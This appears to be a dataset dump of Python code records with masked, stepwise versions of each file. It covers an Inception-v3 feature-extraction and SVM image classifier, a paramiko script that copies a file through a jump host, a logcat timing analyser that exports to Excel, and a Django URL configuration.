| code (string, 13 to 6.09M chars) | order_type (2 classes) | original_example (dict) | step_ids (list, 1 to 5 items) |
|---|---|---|---|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import re
import sys
import tarfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn import datasets
from sklearn import svm
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegression
from numpy import genfromtxt
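# Pipeline sketch (inferred from the code below): each image is pushed through
# a pre-trained Inception-v3 graph, its 2048-dim 'pool_3' activations are
# collected as features, and an SVM is trained on them against train.csv labels.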
def create_graph():
    """Creates a graph from saved GraphDef file and returns a saver."""
    # Creates graph from saved graph_def.pb.
    with tf.gfile.FastGFile(os.path.join(
            '/home/ubuntu/hdd/tensorFlowDic/', 'classify_image_graph_def.pb'), 'rb') as f:
        graph_def = tf.GraphDef()
        graph_def.ParseFromString(f.read())
        _ = tf.import_graph_def(graph_def, name='')

def feature_extraction(image):
    image_data = tf.gfile.FastGFile(image, 'rb').read()
    with tf.Session() as sess:
        softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')
        predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0': image_data})
        predictions = np.squeeze(predictions)
        return predictions
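# Note: despite the variable name, 'pool_3:0' is Inception-v3's 2048-dim
# bottleneck, not the softmax; np.squeeze drops the singleton batch/spatial
# dims so each image yields a flat 2048-vector (hence the (0, 2048) accumulators).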
# create_graph()
# input_x = np.zeros((0,2048))
# for i in range(1,7001):
# imageName = str(i).zfill(5)
# image = '/home/ubuntu/caffe/examples/images/joey/'+imageName+".jpg"
# pre = feature_extraction(image)
# print ("Finish extracting features of training image "+image)
# input_x = np.vstack((input_x,pre))
# print(input_x.shape)
create_graph()  # the Inception graph must be imported before 'pool_3:0' can be looked up
test_x = np.zeros((0,2048))
for i in range(1,971):
    imageName = str(i).zfill(5)
    image = '/home/ubuntu/caffe/examples/images/val/'+imageName+".jpg"
    pre = feature_extraction(image)
    print ("Finished extracting features of test image "+image)
    test_x = np.vstack((test_x,pre))
print(test_x.shape)
input_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv', delimiter=',')
input_label = input_label[1:7001,1].reshape(-1)
input_x = np.load("tensorFlow_train.npz")["arr_0"]  # np.load on .npz returns an archive; unnamed savez args are stored under 'arr_0'
#np.load("tensorFlow_test.npz")
print ('input_x shape ',input_x.shape)
print ('input_label shape ',input_label.shape)
# np.savez_compressed("tensorFlow_train", input_x)
np.savez_compressed("tensorFlow_test", test_x)
X_train, X_test, y_train, y_test = train_test_split(input_x, input_label, test_size=0.1, random_state=42)
clf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)
clf.fit(X_train, y_train)
print('training accuracy is', clf.score(X_train,y_train))
print('validation accuracy is', clf.score(X_test,y_test))
clf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)
clf.fit(input_x, input_label)
y_pred = clf.predict(test_x)
filename = "predict_inception_v3.csv"
f = open(filename, "w")
f.write('Id,Prediction\n')
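# (presumably pads the prediction column so the output CSV always has enough rows)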
if ((len(y_pred))<1000):
    zeros = np.zeros(2000)
    y_pred = np.append(y_pred, zeros).reshape(-1)
for i in range(0,len(y_pred)):
    d = '{0},{1}\n'.format(i+1,int(y_pred[i]))
    f.write(d)
f.close()
|
normal
|
{
"blob_id": "8ef20a7a93d6affabe88dad4e5d19613fe47dd0f",
"index": 5399,
"step-1": "<mask token>\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\n<mask token>\nfor i in range(1, 971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/' + imageName + '.jpg'\n pre = feature_extraction(image)\n print('Finish extracting features of test image ' + image)\n test_x = np.vstack((test_x, pre))\nprint(test_x.shape)\n<mask token>\nprint('input_x shape ', input_x.shape)\nprint('input_label shape ', input_label.shape)\nnp.savez_compressed('tensorFlow_test', test_x)\n<mask token>\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train, y_train))\nprint('validation accuracy is', clf.score(X_test, y_test))\n<mask token>\nclf.fit(input_x, input_label)\n<mask token>\nf.write('Id,Prediction\\n')\nif len(y_pred) < 1000:\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\nfor i in range(0, len(y_pred)):\n d = '{0},{1}\\n'.format(i + 1, int(y_pred[i]))\n f.write(d)\n",
"step-3": "<mask token>\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\ntest_x = np.zeros((0, 2048))\nfor i in range(1, 971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/' + imageName + '.jpg'\n pre = feature_extraction(image)\n print('Finish extracting features of test image ' + image)\n test_x = np.vstack((test_x, pre))\nprint(test_x.shape)\ninput_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv',\n delimiter=',')\ninput_label = input_label[1:7001, 1].reshape(-1)\ninput_x = np.load('tensorFlow_train.npz')\nprint('input_x shape ', input_x.shape)\nprint('input_label shape ', input_label.shape)\nnp.savez_compressed('tensorFlow_test', test_x)\nX_train, X_test, y_train, y_test = train_test_split(input_x, input_label,\n test_size=0.1, random_state=42)\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train, y_train))\nprint('validation accuracy is', clf.score(X_test, y_test))\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(input_x, input_label)\ny_pred = clf.predict(test_x)\nfilename = 'predict_inception_v3.csv'\nf = open(filename, 'w')\nf.write('Id,Prediction\\n')\nif len(y_pred) < 1000:\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\nfor i in range(0, len(y_pred)):\n d = '{0},{1}\\n'.format(i + 1, int(y_pred[i]))\n f.write(d)\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os.path\nimport re\nimport sys\nimport tarfile\nimport numpy as np\nfrom six.moves import urllib\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom numpy import genfromtxt\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\ntest_x = np.zeros((0, 2048))\nfor i in range(1, 971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/' + imageName + '.jpg'\n pre = feature_extraction(image)\n print('Finish extracting features of test image ' + image)\n test_x = np.vstack((test_x, pre))\nprint(test_x.shape)\ninput_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv',\n delimiter=',')\ninput_label = input_label[1:7001, 1].reshape(-1)\ninput_x = np.load('tensorFlow_train.npz')\nprint('input_x shape ', input_x.shape)\nprint('input_label shape ', input_label.shape)\nnp.savez_compressed('tensorFlow_test', test_x)\nX_train, X_test, y_train, y_test = train_test_split(input_x, input_label,\n test_size=0.1, random_state=42)\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train, y_train))\nprint('validation accuracy is', clf.score(X_test, y_test))\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(input_x, input_label)\ny_pred = clf.predict(test_x)\nfilename = 'predict_inception_v3.csv'\nf = open(filename, 'w')\nf.write('Id,Prediction\\n')\nif len(y_pred) < 1000:\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\nfor i in range(0, len(y_pred)):\n d = '{0},{1}\\n'.format(i + 1, int(y_pred[i]))\n f.write(d)\n",
"step-5": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os.path\nimport re\nimport sys\nimport tarfile\n\nimport numpy as np\nfrom six.moves import urllib\nimport tensorflow as tf\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom numpy import genfromtxt\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n # Creates graph from saved graph_def.pb.\n with tf.gfile.FastGFile(os.path.join(\n '/home/ubuntu/hdd/tensorFlowDic/', 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\ndef feature_extraction(image):\n\n\timage_data = tf.gfile.FastGFile(image, 'rb').read()\n\twith tf.Session() as sess:\n\t\tsoftmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n\t\tpredictions = sess.run(softmax_tensor,{'DecodeJpeg/contents:0': image_data})\n\t\tpredictions = np.squeeze(predictions)\n\t\treturn predictions\n\n\n# create_graph()\n# input_x = np.zeros((0,2048))\n# for i in range(1,7001):\n# imageName = str(i).zfill(5)\n# image = '/home/ubuntu/caffe/examples/images/joey/'+imageName+\".jpg\"\n# pre = feature_extraction(image)\n# print (\"Finish extracting features of training image \"+image)\n# input_x = np.vstack((input_x,pre))\n\n# print(input_x.shape)\n\ntest_x = np.zeros((0,2048))\nfor i in range(1,971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/'+imageName+\".jpg\"\n pre = feature_extraction(image)\n print (\"Finish extracting features of test image \"+image)\n test_x = np.vstack((test_x,pre))\n\nprint(test_x.shape)\n\ninput_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv', delimiter=',')\ninput_label = input_label[1:7001,1].reshape(-1)\ninput_x = np.load(\"tensorFlow_train.npz\")\n#np.load(\"tensorFlow_test.npz\")\n\nprint ('input_x shape ',input_x.shape)\nprint ('input_label shape ',input_label.shape)\n\n\n# np.savez_compressed(\"tensorFlow_train\", input_x)\nnp.savez_compressed(\"tensorFlow_test\", test_x)\n\nX_train, X_test, y_train, y_test = train_test_split(input_x, input_label, test_size=0.1, random_state=42)\n\nclf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train,y_train))\nprint('validation accuracy is', clf.score(X_test,y_test))\n\nclf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)\nclf.fit(input_x, input_label)\n\ny_pred = clf.predict(test_x)\nfilename = \"predict_inception_v3.csv\"\nf = open(filename, \"w\")\nf.write('Id,Prediction\\n')\n\nif ((len(y_pred))<1000):\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\n \nfor i in range(0,len(y_pred)):\n d = '{0},{1}\\n'.format(i+1,int(y_pred[i]))\n f.write(d)\n\n\n\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python3
# coding=utf-8
# title :paramiko_sftp.py
# description :
# author :JackieTsui
# organization :pytoday.org
# date :1/16/18 9:22 PM
# email :jackietsui72@gmail.com
# notes :
# ==================================================
# Import the module needed to run the script
import paramiko
import os,sys,time
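# Relays a local tarball to a target host through a jump host: SFTP the file
# onto the jump host, then drive an interactive scp from there to the target.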
jumpip = "192.168.10.1"
jumpuser = "jackie"
jumppass = "123456"
hostname = "192.168.10.2"
user = "root"
password = "654321"
tmpdir = "/tmp"
remotedir = "/data"
localpath = "/home/nginx_access.tar.gz"
tmppath = tmpdir + "/nginx_access.tar.gz"
remotepath = remotedir + "/nginx_access_hd.tar.gz"
port = 22
passinfo = "'s password: "
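# passinfo is the tail of scp's password prompt ("<user>@<host>'s password: ");
# matching on the suffix keeps it independent of the actual user and host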
paramiko.util.log_to_file('syslogin.log')
t = paramiko.Transport((jumpip, port))
t.connect(username=jumpuser, password=jumppass)
sftp = paramiko.SFTPClient.from_transport(t)
sftp.put(localpath, tmppath)  # stage the file at tmppath on the jump host; the scp below forwards it to remotepath
sftp.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(jumpip, port=port, username=jumpuser, password=jumppass)  # a shell can only be opened on a connected client
channel = ssh.invoke_shell()
channel.settimeout(10)
buff = ""
resp = ""
channel.send("scp " + tmppath + " " + user + "@" + hostname + ":" + remotepath + "\n")
while not buff.endswith(passinfo):
    try:
        resp = channel.recv(9999).decode('utf-8')  # recv() returns bytes under Python 3
    except Exception as e:
        print("Error info: " + str(e))
        channel.close()
        ssh.close()
        sys.exit()
    buff += resp
    if not buff.find("yes/no") == -1:
        channel.send("yes\n")
        buff = ""
channel.send(password + "\n")
buff = ""
while not buff.endswith("# "):
resp = channel.recv(9999)
if not resp.find(passinfo) == -1:
print("Error info: Auth failed.")
channel.close()
ssh.close()
sys.exit()
buff += resp
print(buff)
channel.close()
ssh.close()
|
normal
|
{
"blob_id": "64cf6b03fb68be8a23c6e87c8d68d0a42db0eb54",
"index": 6451,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparamiko.util.log_to_file('syslogin.log')\n<mask token>\nt.connect(username=jumpuser, password=jumppass)\n<mask token>\nsftp.put(localpath, remotepath)\nsftp.close()\n<mask token>\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n<mask token>\nchannel.settimeout(10)\n<mask token>\nchannel.send('scp ' + tmppath + ' ' + user + '@' + hostname + ':' +\n remotepath + '\\n')\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print('Error info: ' + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find('yes/no') == -1:\n channel.send('yes\\n')\n buff = ''\nchannel.send(password + '\\n')\n<mask token>\nwhile not buff.endswith('# '):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print('Error info: Auth failed.')\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\nprint(buff)\nchannel.close()\nssh.close()\n",
"step-3": "<mask token>\njumpip = '192.168.10.1'\njumpuser = 'jackie'\njumppass = '123456'\nhostname = '192.168.10.2'\nuser = 'root'\npassword = '654321'\ntmpdir = '/tmp'\nremotedir = '/data'\nlocalpath = '/home/nginx_access.tar.gz'\ntmppath = tmpdir + '/nginx_access.tar.gz'\nremotepath = remotedir + '/nginx_access_hd.tar.gz'\nport = 22\npassinfo = \"'s password: \"\nparamiko.util.log_to_file('syslogin.log')\nt = paramiko.Transport((jumpip, port))\nt.connect(username=jumpuser, password=jumppass)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put(localpath, remotepath)\nsftp.close()\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nchannel = ssh.invoke_shell()\nchannel.settimeout(10)\nbuff = ''\nresp = ''\nchannel.send('scp ' + tmppath + ' ' + user + '@' + hostname + ':' +\n remotepath + '\\n')\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print('Error info: ' + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find('yes/no') == -1:\n channel.send('yes\\n')\n buff = ''\nchannel.send(password + '\\n')\nbuff = ''\nwhile not buff.endswith('# '):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print('Error info: Auth failed.')\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\nprint(buff)\nchannel.close()\nssh.close()\n",
"step-4": "import paramiko\nimport os, sys, time\njumpip = '192.168.10.1'\njumpuser = 'jackie'\njumppass = '123456'\nhostname = '192.168.10.2'\nuser = 'root'\npassword = '654321'\ntmpdir = '/tmp'\nremotedir = '/data'\nlocalpath = '/home/nginx_access.tar.gz'\ntmppath = tmpdir + '/nginx_access.tar.gz'\nremotepath = remotedir + '/nginx_access_hd.tar.gz'\nport = 22\npassinfo = \"'s password: \"\nparamiko.util.log_to_file('syslogin.log')\nt = paramiko.Transport((jumpip, port))\nt.connect(username=jumpuser, password=jumppass)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put(localpath, remotepath)\nsftp.close()\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nchannel = ssh.invoke_shell()\nchannel.settimeout(10)\nbuff = ''\nresp = ''\nchannel.send('scp ' + tmppath + ' ' + user + '@' + hostname + ':' +\n remotepath + '\\n')\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print('Error info: ' + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find('yes/no') == -1:\n channel.send('yes\\n')\n buff = ''\nchannel.send(password + '\\n')\nbuff = ''\nwhile not buff.endswith('# '):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print('Error info: Auth failed.')\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\nprint(buff)\nchannel.close()\nssh.close()\n",
"step-5": "#!/usr/bin/env python3\n# coding=utf-8\n# title :paramiko_sftp.py\n# description :\n# author :JackieTsui\n# organization :pytoday.org\n# date :1/16/18 9:22 PM\n# email :jackietsui72@gmail.com\n# notes :\n# ==================================================\n\n# Import the module needed to run the script\nimport paramiko\nimport os,sys,time\n\n\njumpip = \"192.168.10.1\"\njumpuser = \"jackie\"\njumppass = \"123456\"\nhostname = \"192.168.10.2\"\nuser = \"root\"\npassword = \"654321\"\n\ntmpdir = \"/tmp\"\nremotedir = \"/data\"\nlocalpath = \"/home/nginx_access.tar.gz\"\ntmppath = tmpdir + \"/nginx_access.tar.gz\"\nremotepath = remotedir + \"/nginx_access_hd.tar.gz\"\nport = 22\npassinfo = \"'s password: \"\nparamiko.util.log_to_file('syslogin.log')\n\nt = paramiko.Transport((jumpip, port))\nt.connect(username=jumpuser, password=jumppass)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put(localpath, remotepath)\nsftp.close()\n\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nchannel = ssh.invoke_shell()\nchannel.settimeout(10)\n\nbuff = \"\"\nresp = \"\"\nchannel.send(\"scp \" + tmppath + \" \" + user + \"@\" + hostname + \":\" + remotepath + \"\\n\")\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print(\"Error info: \" + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find(\"yes/no\") == -1:\n channel.send(\"yes\\n\")\n buff = \"\"\n\nchannel.send(password + \"\\n\")\n\nbuff = \"\"\nwhile not buff.endswith(\"# \"):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print(\"Error info: Auth failed.\")\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n\nprint(buff)\nchannel.close()\nssh.close()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import sys
import xlwt
import os
'''
python logcat_time.py config_file logcat_file
'''
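# Python 2 script: scans a logcat file for the start/end tag pairs listed in
# config_file and writes each turn's duration (in ms) to <logcat name>_out.xls.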
config_file = sys.argv[1]
logcat_file = sys.argv[2]
turns_time = 0
turn_compelete_flag = 0
def get_filePath_fileName_fileExt(filename):
    (filepath, tempfilename) = os.path.split(filename)
    (shotname, extension) = os.path.splitext(tempfilename)
    return filepath, shotname, extension
# time-string template: 09:52:24.761; returns the gap in milliseconds
def time_str_distance(old_time_str, new_time_str):
    rst1 = map(int, re.split(':|\.', old_time_str))
    rst2 = map(int, re.split(':|\.', new_time_str))
    distance = (rst2[0] * 60 * 60 * 1000 + rst2[1] * 60 * 1000 + rst2[2] * 1000 + rst2[3]) - (
        rst1[0] * 60 * 60 * 1000 + rst1[1] * 60 * 1000 + rst1[2] * 1000 + rst1[3])
    return distance
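# Config file format (inferred from the split('@') below): one tag pair per line,
#   <column label>@<start tag>@<end tag>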
def read_tag_pair_config(file_path):
    f = open(file_path)
    pair_count = 0
    pair_list = []
    for line in f:
        line = line.strip()
        config_list = line.split('@')
        pair_list.append(config_list)
        pair_count = pair_count + 1
    return pair_list,pair_count
def caculate_tag_distance(str1, str2):
    f = open(logcat_file)
    finish_time = ''
    start_time = ''
    turn_times = 0
    for line in f:
        turn_compelete_flag = False
        if str1 in line:
            turn_compelete_flag = False
            start_time = line.split()[1]
        if str2 in line:
            turn_compelete_flag = True
            finish_time = line.split()[1]
        if turn_compelete_flag:
            turn_times = turn_times + 1
            str_distance = time_str_distance(start_time, finish_time)
            print str_distance
def generate_excel(plist_time_pair,pair_count):
    result_sheet = xlwt.Workbook(encoding='utf-8')
    sheet = result_sheet.add_sheet('result')
    # build the header row
    i = 0
    for pair in tag_pair_list:
        sheet.write(0, i, pair[0])
        i = i + 1
    sheet.write(0, i, "总时间")  # "总时间" = "total time"
    # fill in the data rows
    j = 1
    c = 0
    for time_pair in plist_time_pair:
        print "----------------------------"
        m = 0
        #print time_pair, c
        for tag_time_pair in time_pair:
            time_distance = time_str_distance(tag_time_pair[0], tag_time_pair[1])
            sheet.write(j, m, time_distance)
            m = m + 1
            print "---->",time_distance
        start_time_point = time_pair[0][0]
        finish_time_point = time_pair[pair_count - 1][1]
        all_time = time_str_distance(start_time_point, finish_time_point)
        sheet.write(j, m, all_time)
        c = c + 1
        j = j + 1
    (file_p, file_s, file_e) = get_filePath_fileName_fileExt(logcat_file)
    result_sheet.save(file_s + '_out.xls')
    print ("Finished saving output to excel!")
(tag_pair_list,pair_count) = read_tag_pair_config(config_file)
time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]
f = open(logcat_file)
list_time_pair = []
for line in f:
    i = 0
    if line == '\n':
        continue
    for pair in tag_pair_list:
        if pair[1].strip() in line:
            time_stamp[i][0] = line.split()[1]
        if pair[2].strip() in line:
            time_stamp[i][1] = line.split()[1]
            if i == pair_count - 1:
                compeled_flag = False
                for tm_st in time_stamp:
                    if tm_st[0] == 0 or tm_st[1] == 0:
                        compeled_flag = False
                        break
                    else:
                        compeled_flag = True
                if compeled_flag:
                    list_time_pair.append(time_stamp)
                    all_time = time_str_distance(time_stamp[0][0], time_stamp[pair_count - 1][1])
                    #print "all time:", all_time
                    time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]  # reset the 2-D array for the next turn
        i = i + 1
print '=================='
generate_excel(list_time_pair,pair_count)
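# Usage sketch (hypothetical file names): `python logcat_time.py tags.cfg run.log`
# writes run_out.xls in the current directory, per get_filePath_fileName_fileExt above.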
|
normal
|
{
"blob_id": "585c0f89605f1d791b449f42412174f06d0c5db5",
"index": 5163,
"step-1": "# -*- coding: utf-8 -*-\n# !/usr/bin/python\nimport re\nimport sys\nimport xlwt\nimport os\n\n'''\npython logcat_time.py config_file logcat_file\n'''\n\nconfig_file = sys.argv[1]\nlogcat_file = sys.argv[2]\n\nturns_time = 0\nturn_compelete_flag = 0\n\ndef get_filePath_fileName_fileExt(filename):\n (filepath, tempfilename) = os.path.split(filename);\n (shotname, extension) = os.path.splitext(tempfilename);\n return filepath, shotname, extension\n\n#时间字串模板09:52:24.761\ndef time_str_distance(old_time_str, new_time_str):\n rst1 = map(int, re.split(':|\\.', old_time_str))\n rst2 = map(int, re.split(':|\\.', new_time_str))\n distance = (rst2[0] * 60 * 60 * 1000 + rst2[1] * 60 * 1000 + rst2[2] * 1000 + rst2[3]) - (\n rst1[0] * 60 * 60 * 1000 + rst1[1] * 60 * 1000 + rst1[2] * 1000 + rst1[3])\n return distance\n\ndef read_tag_pair_config(file_path):\n f = open(file_path)\n pair_count = 0\n pair_list = []\n for line in f:\n line = line.strip()\n config_list = line.split('@')\n pair_list.append(config_list)\n pair_count = pair_count + 1\n return pair_list,pair_count\n\ndef caculate_tag_distance(str1, str2):\n f = open(logcat_file)\n finish_time = ''\n start_time = ''\n turn_times = 0\n for line in f:\n turn_compelete_flag = False\n if str1 in line:\n turn_compelete_flag = False\n start_time = line.split()[1]\n if str2 in line:\n turn_compelete_flag = True\n finish_time = line.split()[1]\n if turn_compelete_flag:\n turn_times = turn_times + 1\n str_distance = time_str_distance(start_time, finish_time)\n print str_distance\n\ndef generate_excel(plist_time_pair,pair_count):\n result_sheet = xlwt.Workbook(encoding='utf-8')\n sheet = result_sheet.add_sheet('result')\n # 生成表头\n i = 0\n for pair in tag_pair_list:\n sheet.write(0, i, pair[0])\n i = i + 1\n sheet.write(0, i, \"总时间\")\n # 生成数据\n j = 1\n c = 0\n for time_pair in plist_time_pair:\n print \"----------------------------\"\n m = 0\n #print time_pair, c\n for tag_time_pair in time_pair:\n time_distance = time_str_distance(tag_time_pair[0], tag_time_pair[1])\n sheet.write(j, m, time_distance)\n m = m + 1\n print \"---->\",time_distance\n start_time_point = time_pair[0][0]\n finish_time_point = time_pair[pair_count - 1][1]\n all_time = time_str_distance(start_time_point, finish_time_point)\n sheet.write(j, m, all_time)\n c = c + 1\n j = j + 1\n (file_p, file_s, file_e) = get_filePath_fileName_fileExt(logcat_file)\n result_sheet.save(file_s + '_out.xls')\n print (\"Finished save output to excel!\")\n\n\n(tag_pair_list,pair_count) = read_tag_pair_config(config_file)\ntime_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]\n\nf = open(logcat_file)\nlist_time_pair = []\nfor line in f:\n i = 0\n if line == '\\n':\n continue\n for pair in tag_pair_list:\n if pair[1].strip() in line:\n time_stamp[i][0] = line.split()[1]\n if pair[2].strip() in line:\n time_stamp[i][1] = line.split()[1]\n if i == pair_count - 1:\n compeled_flag = False\n for tm_st in time_stamp:\n if tm_st[0] == 0 or tm_st[1] == 0:\n compeled_flag = False\n break\n else:\n compeled_flag = True\n if compeled_flag:\n list_time_pair.append(time_stamp)\n all_time = time_str_distance(time_stamp[0][0], time_stamp[pair_count - 1][1])\n #print \"all time:\", all_time\n time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)] # 二位数组置空\n i = i + 1\nprint '=================='\n\ngenerate_excel(list_time_pair,pair_count)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.contrib import admin
from django.contrib.staticfiles.urls import static  # book Ch. 11.1
from django.urls import path, include
from . import settings_common, settings_dev  # book Ch. 11.1
import debug_toolbar
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('login_test_app.urls')),
    path('accounts/', include('allauth.urls')),  # allauth default URLs: book p. 218
    path('__debug__/', include(debug_toolbar.urls)),
]
# On the development server, append the media routes returned by the
# django.contrib.staticfiles.urls.static function given MEDIA_URL and MEDIA_ROOT.
urlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)
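# Note: django's static() helper returns [] when settings.DEBUG is False, so
# this line only has an effect in development.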
|
normal
|
{
"blob_id": "ce626afa7c0fd2e190afd92b57a0ebebf19f9e9b",
"index": 6842,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
